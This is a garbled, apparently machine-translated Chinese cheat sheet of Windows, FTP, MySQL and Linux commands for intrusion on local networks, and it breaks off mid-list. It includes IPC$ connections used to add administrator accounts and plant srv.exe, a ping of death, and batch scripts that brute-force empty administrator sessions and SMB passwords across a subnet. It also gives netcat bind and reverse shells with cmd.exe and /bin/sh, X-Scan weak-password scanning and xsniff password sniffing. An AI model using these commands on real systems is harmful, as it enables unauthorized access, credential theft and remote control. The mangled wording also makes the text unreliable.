Lan command collection

Net view can see all the machines in the LAN, and then PING it to know, This method may be stupid, but very useful.
Lan doscommand set
Net use \ ip \ ipc $ ""/user: "" Create an empty IPC Link
Net use \ ip \ ipc $ "password"/user: "user Name" Create an IPC non-empty Link
Net use h: \ ip \ c $ "password"/user: "user Name" directly log on and map to the other Party C: to the local H:
Net use h: \ ip \ c $ after login ing to the other Party C: to the local H:
Net use \ ip \ ipc $/del Delete IPC Link
. Net use h:/del: Delete the H ing from the ing peer to the local host that is h:
Net user username and password/add create user
Net user g
St/active: yes activated g
St user
. Net user.
Net user account name view account attributes
Net localgroup *** istrators user name/add "user" to the administrator so that it has administrator permissions. Note: *** after istrator, add s to use the plural number.
Net start to check which services are enabled
. Net start service name. (For example, net start telnet and net start schedule)
Net stop service name to stop a service
Net time \ target ip address view peer time
Net time \ target ip/set sets the time synchronization between the local computer time and the "target IP" host, and the parameter/yes can cancel the confirmation information.
. Net view.
Net view \ ip to view which shares are enabled in the Peer LAN
Net config display system network settings
. Net logoff disconnection sharing
. Net pause service name: suspend a service
Net send ip "Text Information" sends information to the recipient
Network Connection type and information being used in the net ver LAN
. Net share
Net share ipc $ enable ipc $ share
Net share ipc $/del Delete ipc $ share
Net share c $/del Delete C: share
Net user g
St 12345g
After logging on to the st user, change the password to 12345.
Net password Change System Login password
Netstat-a is usually used to check which ports are enabled.
Netstat-n is commonly used to view the network connection of a port.
Netstat-v view ongoing work
Netstat-p protocol name example: netstat-p tcq/ip to view the usage of a protocol (view the usage of TCP/IP protocol)
Netstat-s: view all protocol usage in use
If an nbtstat-A ip address is enabled on one of the ports from 136 to 139, you can view the user name that the other party recently logged on to (the user name is before 03). Note: Parameter-A must be capitalized.
Tracert-parameter ip (or computer name) Tracking routing (packet), parameter: "-w number" is used to set the timeout interval.
Ping An ip address (or domain name) to send 32-byte data to the host. Parameter: "-l [space] data packet size"; "-n data transmission count "; "-t" indicates that the ping is always performed.
Ping-t-l 65550 ip address death ping (send a file larger than 64 KB and ping it until the ping ends)
Ipconfig (winipcfg) is used for windows NT and XP (windows 95 98) to view the local IP address. The "/all" parameter of ipconfig shows all configuration information.
Tlist-t displays processes in the tree line list (this is an additional system tool, which is not installed by default and is in the Support/tools folder of the installation directory)
After the kill-F process name is added with the-F parameter, a process is forcibly terminated. (This is an additional tool of the system. It is not installed by default. It is in the Support/tools folder of the installation directory)
After the del-F file name and the-F parameter are added, the read-only files can be deleted./AR,/AH,/AS, And/AA respectively indicate the deletion of read-only, hidden, system, and archive files, /A-R,/A-H,/A-S,/A-A means to delete files except read-only, hidden, system, archive. For example, "DEL/AR *. *" means to delete all read-only files in the current directory, "DEL/A-S *. *" means to delete all files except system files in the current directory
 
#2 II:
 
Del/S/Q directory or use: rmdir/s/Q directory/S to delete all subdirectories and files in the directory. At the same time, you can use the parameter/Q to cancel the deletion operation and then delete it directly. (The two commands serve the same purpose)
Move drive letter \ path \ file name to be moved storage path of the mobile file \ move the file name to move the file, use the parameter/y to cancel the confirmation that the Mobile Directory contains the same file prompt and overwrite it directly
Fc one.txt two.txt> 3st.txt compares two files and outputs them to the 3st.txt file. ">" and ">" are redirection commands.
At ID: Enable a registered scheduled task
At/delete: stops all scheduled tasks. Use the/yes parameter to stop the tasks without confirmation.
At ID/delete: Stop a registered scheduled task
At view all scheduled tasks
At \ ip time program name (or a command)/r runs a program of the other party at a certain time and restarts the computer
Finger username @ host
Telnet ip port: Remote and login server, default port: 23
Connecting an open ip address to an IP address (the command after telnet logon)
Telnet directly type telnet on the local machine to enter the local telnet
Copy path \ file name 1 path \ file name 2/y copy file 1 to the specified directory as file 2, use the parameter/y to cancel the confirmation at the same time you want to rewrite an existing directory file
Copy c: \ srv.exe \ ip \ *** $ copy local c: \ srv.exe to the other party's ***
Cppy 1st.jpg/b4242st.txt/a 3st.jpg contains a new file. Note: The 2st.txt File Header must be empty in three rows. Parameter:/B indicates the binary file, And/a indicates the ASCLL file.
Copy \ ip \ *** $ \ svv.exe c: \ or: copy \ ip \ *** $ \*. * copy the srv.exe file (all files) shared by the peer *** IMG to the local C:
The target address of the file or directory tree to be copied in xcopy. \ directory name: copy the file and directory tree. The parameter/Y does not prompt to overwrite the same file.
After you get server.exe c: \ server.exe and log on to the target host, download the server.exe file of the specified IP address to the parameter c: \ server.exe of the target host: -I refers to binary transfer, which is used for transferring exe files. If-I is not added, it is transmitted in ASCII mode (Transfer text file mode ).
After logging on to the tftp-I peer IP put c: \ server.exe, upload the local c: \ server.exe to the host
The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to binary transfer (executable files). The default value is ASCII transfer (for text files)
Route print displays the IP route. The Network address Network addres, subnet mask Netmask, Gateway address addres, and Interface address are displayed.
Arp is used to view and process ARP caches. ARP is used to resolve an IP address into a physical MAC address. Arp-a displays all information
Start program name or command/max or/min open a new window and maximize (minimize) run a program or command
Mem view cpu usage
Attrib file name (directory name) to view the attributes of a file (directory)
Attrib file name-A-R-S-H or + A + R + S + H remove (ADD) the archive of A file, read-only, system, and hidden attribute; use + to add an attribute
Dir: view the file. The parameter "/Q" indicates the user of the file and directory system./T: C indicates the file creation time./T: A indicates the last file access time./T: w. last modification time
Date/t, time/t use this parameter, that is, "DATE/T", "TIME/T" will only display the current date and time, without entering a new DATE and TIME
Set specifies the environment variable name = the character to be assigned to the variable to set the environment variable
Set displays all current environment variables
Set p (or other characters) displays all environment variables starting with p (or other characters ).
Pause the batch processing program and display: press any key to continue ....
If execute condition processing in the batch processing program (for more information, see if command and variable)
The goto tag directs cmd.exe to the rows with labels in the batch processing program (the tag must be a separate row and headers with colons, for example, the ": start" tag)
Call path \ batch processing file name call another batch processing program from the batch processing program (for more information, see call /?)
For execution of a specific command on each file in a group of files (for more information, see for command and variable)
Echo on or off enables or disables echo. The current echo settings are displayed only when echo is used without parameters.
Echo information is displayed on the screen
Echo information> pass.txt: Save "information" to the pass.txt File
Findstr "Hello" aa.txt search for the string hello in the aa.txt File
Find file name to find a file
Title name change the title name of the CMD window
Set the color value to the foreground and background colors of the cmd console; 0 = Black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, C = light red, D = light purple, E = light yellow, F = light white
The prompt name is changed to the command prompt displayed by cmd.exe (Change C: \ and D: \ To EntSky \)
 
#3 3:
 
Ver displays version information in the DOS window
In the winver pop-up window, the version information (memory size, system version, patch version, and computer name) is displayed)
Format drive letter/FS: Type Format disk, type: FAT, FAT32, NTFS, for example: format D:/FS: NTFS
Md directory name create directory
Replace the directory of the source file to be replaced
Rename original file name New File Name
Tree displays the directory in a tree structure, and uses the-f parameter to list the file names in the first folder.
Type file name display text file content
More file names display output files on screen
Doskey command to be locked = character
Doskey UNLOCK command = Lock Command provided for DOS (edit command line, re-call win2k command, and create macro ). For example, run the following command to lock the dir: doskey dir = entsky (doskey dir = dir cannot be used); unlock: doskey dir =
Taskmgr call up the Task Manager
Chkdsk/f d: Check disk D and display status report; add parameter/f and fix disk errors
Tlntadmn telnt service admn, type tlntadmn to select 3, and then select 8, you can change telnet service default port 23 to any other port
Exit to exit the cmd.exe program. Currently, the parameter/B is used to exit the current batch processing script, not cmd.exe.
Path \ the file name of the executable file sets a path for the executable file.
Cmd starts a Windows 2 K Command explanation window. Parameters:/eff,/en, and enable command extension. For more information, see cmd /?
Regedit/s registry file name import to registry; parameter/S indicates quiet mode import, no prompt;
Regedit/e registry file name export Registry
Cacls file name parameters display or modify the file access control list (ACL)-for NTFS format. Parameter:/D User name: Set to deny access to a user;/P User name: perm to replace the access permission of the specified user;/G User name: perm to grant the access permission to the specified user; Perm can be: N none, R read, W write, C Change (write), F full control; for example, cacls D: \ test.txt/D p sets d: \ test.txt to reject user access to p.
Cacls file name to view the object access user permission list
Add annotation to the batch file for REM text content
Netsh to view or change the local network configuration
 
#4 4:
 
IIS service command:
Iisreset/reboot restart win2k computer (but a message is prompted that the system will restart)
Iisreset/start or stop all Internet services
Iisreset/restart stop and restart all Internet services
Iisreset/status displays the status of all Internet services
Enable or disable Internet service restart on the local system
Iisreset/rebootonerror when the Internet service is started, stopped, or restarted, the system restarts if an error occurs.
Iisreset/noforce: if the Internet service cannot be stopped, the Internet service will not be forcibly terminated.
Iisreset/timeout Val does not stop the Internet service when it reaches the time (in seconds). If the/rebootonerror parameter is specified, the computer restarts. The default value is restart for 20 seconds, stop for 60 seconds, and restart for 0 seconds.
FTP command: (details are provided later)
The ftp command line format is:
Ftp-v-d-I-n-g [host name]-v displays all the response information of the remote server.
-D. Use the debugging method.
-N restrict ftp automatic logon, that is, the. netrc file is not used.
-G cancels the global file name.
Help [command] or? [Command] view command instructions
Bye or quit terminates the FTP process on the host and exits FTP management.
Pwd list the current remote host directory
Put or send local file name [file name uploaded to the host] transfers a local file to the remote host
Get or recv [remote host file name] [download to local file name] transfer from remote host to local host
Mget [remote-files] receives a batch of files from the remote host to the local host.
Mput local-files transfers a batch of files from the local host to the remote host
Dir or ls [remote-directory] [local-file] to list files in the directory of the current remote host. If a local file exists, write the result to the local file.
Ascii settings transfer files in ASCII mode (default)
Bin or image sets File Transfer in binary mode
Bell sends an alarm every time a file is transferred.
Cdup returns to the upper-level directory
Close interrupts the ftp session with the remote server (corresponds to open)
Open host [port] To establish a connection to the specified ftp server. You can specify the connection port.
Delete files from the remote host
Mdelete [remote-files] deletes a batch of files
Mkdir directory-name: create a directory in the remote host
Rename [from] [to] Change the file name in the remote host
Rmdir directory-name: Delete the directory in the remote host
Status: displays the status of the current FTP
System displays the remote host system type
User-name [password] [account] log on to the remote host with another user name
Open host [port] re-establishes a new connection
Prompt interaction prompt Mode
Macdef macro commands
The LCD changes the working directory of the current local host. If it is set to default, it is transferred to the HOME Directory of the current user.
Chmod changes the File Permission of the remote host
When the case is ON, use the MGET command to copy the file name to the local machine, convert all to lowercase letters
Cd remote-dir: Enter the remote host directory
Cdup enters the parent directory of the remote host directory
! Execute the interactive shell on the local machine and exit to return to the ftp environment, such! Ls *. zip
 
#5:
 
MYSQL command:
Mysql-h host address-u user name-p password to connect to MYSQL; If MYSQL is just installed, the Super User root has no password.
(For example, mysql-h110.110.110.110-Uroot-P123456)
Note: u and root do not need to add spaces. The same applies to others)
Exit to exit MYSQL
Mysql ***-u username-p old password New password Change password
Grant select on database. * to username @ login host identified by \ "password \"; Add new users. (Note: Unlike the above, the following commands in the MYSQL environment are followed by a semicolon as the command Terminator)
Show databases; displays the Database List. At the beginning, there were only two databases: mysql and test. The mysql database contains the MYSQL system information. We change the password and add new users to use this database for operations.
Use mysql;
Show tables; displays data tables in the database
Describe table name; displays the table structure
Create database name; database creation
Use Database Name;
Create table Name (field setting list); create table
Drop database name;
Drop table name; delete database and table
Delete from table name; clear table records
Select * from table name; displays records in the table
Mysqldump -- opt school> school. bbb backup database: (the command is executed in the DOS \ mysql \ bin directory); Note: Back up the database school to school. bbb file, school. bbb is a text file with any file name. Open it and you will find a new one.
Add commands in win2003 System (practical part ):
Shutdown/the parameter disables or restarts the local or remote host.
Parameter description:/S disables the host,/R restarts the host,/T number sets the delay time, range 0 ~ Within 180 seconds,/A will cancel the boot and/M // the remote host specified by the IP address.
Example: shutdown/r/t 0 restart the local host immediately (no delay)
Taskill/the parameter process name or pid of the process to terminate one or more tasks and processes.
Parameter description:/PID indicates the pid of the process to be terminated. You can use the tasklist command to obtain the pid of each process, the name of the process to be terminated by the IM, And/F to forcibly terminate the process, /T terminate the specified process and its sub-processes.
Tasklist displays the process identifier (PID) of processes, services, and services currently running on local and remote hosts ).
Parameter description:/M lists the dll files loaded by the current process./SVC displays the services of each process. If no parameter is set, only the current process is listed.
 
#6:
 
Basic commands in Linux: Case Sensitive
Uname: displays version information (same as that of win2K)
Dir: displays the current directory file. ls-al: displays hidden files (same as windows 2 k dir)
Pwd query the current directory location
Cd .. go back to the previous directory. Note that there is a space between cd and. Cd/return to the root directory.
Cat file name View File Content
Cat> abc.txt write the content into the abc.txt file.
The more File Name displays a text file on one page.
Cp copy file
Mv mobile File
Rm file name delete file, rm-a directory name Delete directory and subdirectory
Create directory by mkdir directory name
Rmdir: Delete the sub-directory. There is no document in the directory.
Chmod sets the access permission for files or directories
Grep searches for strings in the file
Comparison of diff Archives
Find file search
Current date and time of date
Who queries the people who are using the same machine as you and the Login time and location
W. query the detailed information of the current host.
Whoami
Groups
Passwd Change Password
History
Ps displays the Process status
Kill to stop a process
Gcc hackers usually use it to compile files written in C language.
Su permission conversion to specified user
Telnet the IP address to connect to the host (same as win2K). When bash $ is displayed, the connection is successful.
Ftp connection to a server (same as win2K)
 
Appendix: batch processing commands and variables
 
1: Basic Format of for commands and variables:
FOR/parameter % variable IN (set) DO command [command_parameters] % variable: specify a parameter that can be replaced by a single letter, FOR example, % I, and specify a variable: % I, which is case sensitive (% I is not equal to % I ).
Each batch processing can process 10 variables from % 0-% 9, of which % 0 is used by default for batch file names, % 1 is the first value input when this batch is used by default. Similarly, % 2-% 9 indicates the input value 2-9. For example: net use \ ip \ ipc $ pass/user: the ip address in user is % 1, pass is % 2, and user is % 3
 
(Set): Specifies one or more files. Wildcards can be used, such as: (D: \ user.txt) and (1 1 254) (1-1 254 ), {"(1 254)" the first "1" indicates the start value, the second "1" indicates the growth volume, and the third "254" indicates the end value, that is: from 1 to 254; "(1-1 254)" Description: from 254 to 1}
 
Command: Specifies the command to be executed on the first file, such as the net use command. If you want to execute multiple commands, the command is separated: &.
Command_parameters: specify a parameter or command line switch for a specific command
 
IN (set): refers to the value IN (set); DO command: refers to the execution of command
 
Parameter:/L indicates the incremental form {(set) is the incremental form};/F indicates the constant value from the file until it is obtained {(set) is the file, for example, (d: \ pass.txt }.
Example:
@ Echo off
Echo format: test. bat *. *. *> test.txt
 
For/L % G in (1 254) do echo % 1.% G> test.txt & net use \ % 1.% G/user: *** istrator | find "command completed successfully"> test.txt
Save as test. bat. Note: For the 254 IP addresses of a specified class c cidr Block, try to establish a *** istratorpassword for an empty ipc$connection. If it succeeds, the IPaddress will be stored in test.txt.
 
/L indicates the incremental format (from 1-254 or-1); the first three digits of the input IP Address :*. *. * The default value is % 1 for batch processing. % G is the variable (the last digit of the ip address). & it is used to separate the echo and net use commands; | indicates that after ipc $ is created, use find in the result to check whether "command is successfully completed" information; % 1.% G is the complete IP address. (1 1 254) indicates the starting value, growth volume, and end value.
@ Echo off
Echo format: OK. bat ip
FOR/F % I IN (D: \ user. dic) DO smb.exe % 1% % I D: \ pass. dic 200
Save as: OK .exe Description: after entering an IP address, use the dictionary file d: \ pass. dic to crack the user password in d: \ user. dic until the value of the file is obtained. % I is the user name; % 1 is the input IP address (default ).
 
#7:
 
2: if command and variable basic format:
IF [not] errorlevel numeric command statement IF the program runs the program and returns an exit code equal to or greater than the specified number, the specified condition is "true ".
For example, IF errorlevel 0 refers to the command after the program executes and returns a value of 0. IF not errorlevel 1 refers to the value not equal to 1 after the program executes, run the following command.
0 indicates that the task is detected and executed successfully (true). 1 indicates that the task is not found or executed (false ).
IF [not] string 1 = string 2, IF the specified text string matches (that is, string 1 equals string 2), run the following command.
For example, "if" % 2% "=" 4 "goto start" indicates that if the second input variable is 4, run the following command (note: when the variable is called, % variable name % is added "")
IF [not] exist file name command statement IF the specified file name exists, execute the following command.
For example, "if not nc.exe goto end" means that if the nc.exe file is not found, it will jump to the ": end" tab.
IF [not] errorlevel numeric command statement else command statement or IF [not] string 1 = string 2 command statement else command statement or IF [not] exist file name command statement else command statement plus: after the else command statement, it refers to the command after the else command line when the current condition is invalid. Note: else must be in the same line as if to be valid. When there is a del command, you must <> enclose all the del commands, because the del command can only be executed in a single line. After using <>, It is equal to a single line. For example: "if exist test.txt. <del test.txt.> else echo test.txt. missing, pay attention to the "."
 
(2) system external commands (related tools must be downloaded ):
 
1. Swiss Army knife: nc.exe
 
Parameter description:
-H: View help information
-D background Mode
-E prog program redirection, which is executed once the connection is established [dangerous 〕
-I secs latency Interval
-L listening mode for inbound connection
-L listening mode. After the connection day is closed, the listener continues until the CTR + C
-N IP address, cannot use Domain Name
-O film records hexadecimal Transmission
-P [space] local port number
-R random local and remote ports
-T use Telnet Interaction Mode
-U P Mode
-V: Detailed output. Use-vv to show more details.
-W digital timeout delay interval
-Z: Turn off the input and output (used to scan the anchor)
Basic usage:
Nc-nvv 192.168.0.1 80 connects to port 80 of the host 192.168.0.1
Nc-l-p 80 enables TCP port 80 of the Local Machine and listens
Nc-nvv-w2-z 192.168.0.1 80-1024 scan the port 80-1024 of 192.168.0.1
Nc-l-p 5354-t-e c: winntsystem320000.exe bind the remote host's shell to the remote TCP port 5354
Nc-t-e c: winntsystem320000.exe 192.168.0.2 5354 configure the remote host's internal shell and reverse connect to port 5354 of 192.168.0.2
Advanced usage:
1 for nc-L-p 80 as a honeypot: Enable and constantly listen to port 80 until CTR + C
Nc-L-p 80> c: \ log.txt as a honeypot 2: Enable and constantly listen to port 80 until CTR + C, and output the result to c: \ log.txt
Nc-L-p 80 <c: \ honeyport.txt is used as a honeypot with 3-1: Enable and constantly listen to port 80 until CTR + C, and set c: the content in \ honeyport.txt is sent to the media transcoding queue.
Type.exe c: \ honeyport | nc-L-p 80 is used as a honeypot 3-2: Enable and constantly listen to port 80 until CTR + C, and set c: the content in \ honeyport.txt is sent to the media transcoding queue.
Local Port: nc-l-p
Use nc-e cmd.exe local IP address-p local port * win2K on the target host
Nc-e/bin/sh local IP address-p local port * linux, unix reverse connection breaks through the firewall of the other host
Local Port: nc-d-l-p <file path and name to be transferred
Use the local IP address nc-vv on the host to store the file path and name to transfer the file to the host.
Secondary note:
| MPs queue command
<Or> redirect command. "<", For example: tlntadmn <test.txt indicates assigning the content of test.txt to the tlntadmn command.
@ Indicates that the command after @ is executed, but it is not displayed (executed in the background). For example, @ dir c: \ winnt> d: \ log.txt indicates that dir is executed in the background, and the result is stored in d: \ log.txt.
> And> difference ">" means: overwrite; ">" means: Save to (add ).
For example, run the following two Commands: @ dir c: \ winnt> d: \ log.txt and @ dir c: \ winnt> d: \ log.txt to perform two comparisons:> is used to save the second result, while ">" is used only once because the second result overwrites the first result.
 
#8:
 
2. Scan the anchor tool: xscan.exe
 
Basic Format
Xscan-host <start IP> [-<End IP>] <check item> [other options] scan the host information of all hosts in the "Start IP to end IP" segment
Xscan-file Detection item
-Active: checks whether the host is alive.
-OS remote operating system type detection (via NETBIOS and SNMP Protocol)
-Port: checks the port status of common services.
-Ftp weak FTP password detection
-P checks anonymous FTP Service User Write Permissions
-Pop3 weak POP3-Server password detection
-Smtp-Server Vulnerability Detection
-SQL detection SQL-Server Weak Password
-Smb detects weak NT-Server passwords
-Iis detects the IIS encoding/Decoding Vulnerability
-Cgi Vulnerability Detection
-Nasl loads the Nessus Attack Script
-All: detects all the above items.
Other options
-I adapter number: Set the network adapter. <adapter number> You can obtain it through the "-l" parameter.
-L display all network adapters
-V: displays the detailed scan progress.
-P skips the host with No Response
-O skips hosts with no ports Detected
-T number of concurrent threads. The number of concurrent hosts specifies the maximum number of concurrent threads and the number of concurrent hosts. The default number is, 10.
-Log File Name: Specifies the scan report file name (Suffix: TXT or HTML files)
Usage example
Xscan-host 192.168.1.1-192.168.255.255-all-active-p detects all vulnerabilities on hosts in the 192.168.1.1-192.168.255.255 network segment and skips unresponsive hosts.
Xscan-host 192.168.1.1-192.168.255.255-port-smb-t 150-o checks the standard port status of the host in the 192.168.1.1-192.168.255.255 network segment. If you are an NT weak password user, the maximum number of concurrent threads is 150, skip hosts with no ports Detected
Xscan-file hostlist.txt-port-cgi-t 200, 5-v-o detects the standard port status of all hosts listed in the “hostlist.txt file. The CGI vulnerability has a maximum number of concurrent threads, A maximum of five hosts can be detected at the same time, and detailed detection progress is displayed. Skip hosts with no ports detected.
 
#9:
 
3. Command Line sniffer: xsniff.exe
Attackers can Capture FTP, SMTP, POP3, and HTTP passwords in a LAN.
Parameter description
-Tcp output TCP Datagram
-P: Output P Datagram
-Icmp: Output ICMP Datagram
-Pass: Filter password information
-Hide background running
-Host resolution host Name
-Addr IP address filtering IP Address
-Port filtering port
-Log File Name: Save the output to the file
-Asc output in ASCII format
-Hex output in hexadecimal format
Usage example
Xsniff.exe-pass-hide-log pass. log runs the sniffing password in the background and stores the password information in the pass. log file.
Xsniff.exe-tcp-p-asc-addr 192.168.1.1 sniffing 192.168.1.1 and filtering tcp and p information and outputting in ASCII format
 
4. Terminal Service password cracking: tscrack.exe
 
Parameter description
-H